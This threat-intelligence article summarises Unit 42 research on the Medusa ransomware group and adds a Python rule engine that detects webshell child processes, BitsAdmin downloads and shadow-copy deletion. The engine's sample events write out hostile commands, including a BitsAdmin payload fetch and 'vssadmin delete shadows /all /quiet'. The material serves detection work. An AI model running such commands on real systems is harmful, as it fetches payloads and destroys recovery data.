An escalation of ransomware activity from the Medusa ransomware-as-a-service (RaaS) is reported by researchers from Unit 42. Not to be confused with MedusaLocker, the Medusa ransomware gang is a distinct group. Their extortion tactics intensified in early 2023 with a public-facing blog and Telegram channel, where they disclose sensitive data of non-compliant victims, adding pressure through public exposure alongside negotiated ransom demands. Medusa operators have predominantly targeted Windows environments and leveraged sophisticated strategies, including exploiting vulnerabilities and using initial access brokers for infiltration.
Medusa's operation is marked by multi-extortion techniques, offering victims paid options such as a deadline extension, data deletion, or data download. The group targets a wide range of industries, displaying the opportunistic nature typical of many ransomware groups. Based on the data collected by Unit 42, the most heavily impacted industries are (in order) technology, education, manufacturing, healthcare, wholesale, and retail. Their global footprint is extensive, with the United States being the most affected, followed by several European countries. Their tactics include the use of webshells for initial access, defense evasion through kernel drivers and software protectors, and reconnaissance using advanced tools such as Netscan with custom configurations.
Before the encryptor is executed, Unit 42 observed the operators deploying ASPX webshells and using PowerShell to download payloads with BitsAdmin. The downloaded files have included remote monitoring and management (RMM) software. Kernel drivers are also used to query and terminate security products running on the endpoint. Tools used during the discovery phase have included built-in Windows processes, Netscan, and scripts.
Their ransomware encryptor, aptly named 'Gaze', draws its moniker from a distinct pattern observed by Unit 42 in the ransomware's binary. This pattern, as they note, "aligns with the mythology of Medusa herself: the use and inclusion of the term gaze in the debug path." The binary is sophisticated in its approach, using string encryption and RSA asymmetric encryption to protect the AES256 key used for file encryption. The ransomware avoids certain file types and directories to maximize its impact and leaves a detailed ransom note in each affected directory. Additionally, Medusa's operators hinder recovery efforts and forensic analysis by deleting shadow copies and removing the ransomware's own binary.
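The pre-encryption and recovery-inhibition behaviours described above (an IIS worker process spawning a shell as a webshell indicator, BitsAdmin used to fetch a payload, and shadow-copy deletion) are the kind of process-creation telemetry a SOC would write rules against. The following is an added example written for this page, not code from Unit 42 or from the Medusa report: a small rule engine in Python that evaluates Sysmon-style process-creation records against three such rules and then flags hosts where more than one stage of the chain fires. The event records, host names, paths and URL are all constructed sample data, and the rule names and field names are assumptions for the example.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample process-creation events (Sysmon Event ID 1-style fields).
# Hosts, paths and the URL are made up for the example; they are not IoCs from the report.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "web01", "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"host": "web01", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer job /download /priority high "
                "http://example.invalid/a.exe C:\\Users\\Public\\a.exe"},
    {"host": "fs01", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\vssadmin.exe", "cmdline": "vssadmin delete shadows /all /quiet"},
    {"host": "ws07", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe C:\\Users\\alice\\notes.txt"},
    # Benign administrative use of vssadmin: must not be flagged.
    {"host": "fs01", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\vssadmin.exe", "cmdline": "vssadmin list shadows"},
]


@dataclass(frozen=True)
class Rule:
    """A detection rule; every non-None pattern must match its event field."""
    rule_id: str
    description: str
    parent: Optional[re.Pattern] = None
    image: Optional[re.Pattern] = None
    cmdline: Optional[re.Pattern] = None

    def matches(self, event: Dict[str, str]) -> bool:
        for field_name, pattern in (("parent", self.parent),
                                    ("image", self.image),
                                    ("cmdline", self.cmdline)):
            if pattern is not None and not pattern.search(event.get(field_name, "")):
                return False
        return True


# Rule names and wording are this example's own choices, not the report's.
RULES: List[Rule] = [
    Rule("webshell_child_process",
         "IIS worker process (w3wp.exe) spawning a command shell; consistent with an ASPX webshell",
         parent=re.compile(r"\\w3wp\.exe$", re.I),
         image=re.compile(r"\\(cmd|powershell|pwsh)\.exe$", re.I)),
    Rule("bitsadmin_download",
         "BitsAdmin transfer job pulling a file from an HTTP(S) URL",
         image=re.compile(r"\\bitsadmin\.exe$", re.I),
         cmdline=re.compile(r"/transfer.*\bhttps?://", re.I)),
    Rule("shadow_copy_deletion",
         "Volume shadow copies being deleted, which inhibits recovery",
         image=re.compile(r"\\(vssadmin|wmic)\.exe$", re.I),
         cmdline=re.compile(r"delete\s+shadows|shadowcopy\s+delete", re.I)),
]


def evaluate(events: List[Dict[str, str]], rules: List[Rule] = RULES) -> List[Dict[str, str]]:
    """Return one alert per (event, rule) match, in event order."""
    alerts = []
    for event in events:
        for rule in rules:
            if rule.matches(event):
                alerts.append({"rule_id": rule.rule_id, "host": event["host"],
                               "cmdline": event["cmdline"], "description": rule.description})
    return alerts


def hosts_with_multiple_stages(alerts: List[Dict[str, str]], min_stages: int = 2) -> List[str]:
    """Hosts on which at least `min_stages` distinct rules fired: higher-confidence chain."""
    stages_by_host: Dict[str, set] = {}
    for alert in alerts:
        stages_by_host.setdefault(alert["host"], set()).add(alert["rule_id"])
    return sorted(h for h, stages in stages_by_host.items() if len(stages) >= min_stages)


if __name__ == "__main__":
    found = evaluate(SAMPLE_EVENTS)
    for a in found:
        print(f"[{a['rule_id']}] {a['host']}: {a['cmdline']}")
    print("hosts with a multi-stage chain:", hosts_with_multiple_stages(found))
```

Run on the constructed events, the engine raises three alerts (the webshell child process and the BitsAdmin download on web01, the shadow-copy deletion on fs01) and leaves the benign `vssadmin list shadows` and notepad events alone; only web01 is reported as a multi-stage chain. In production the same rules would be expressed in the SIEM's own language (Sigma, KQL, SPL), and the chaining step is where the individual indicators, each noisy on its own, become actionable.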
Like other cybercriminals, the Medusa group's operations exhibit ruthless behavior, as evidenced by their ransomware attack on the Minneapolis Public School (MPS) District in February 2023. This attack resulted in the leakage of 100 GB of sensitive data, including information about teachers and students. According to an NBC News analysis of the leaked files, the exposed data alarmingly included highly confidential reports detailing instances of student mistreatment.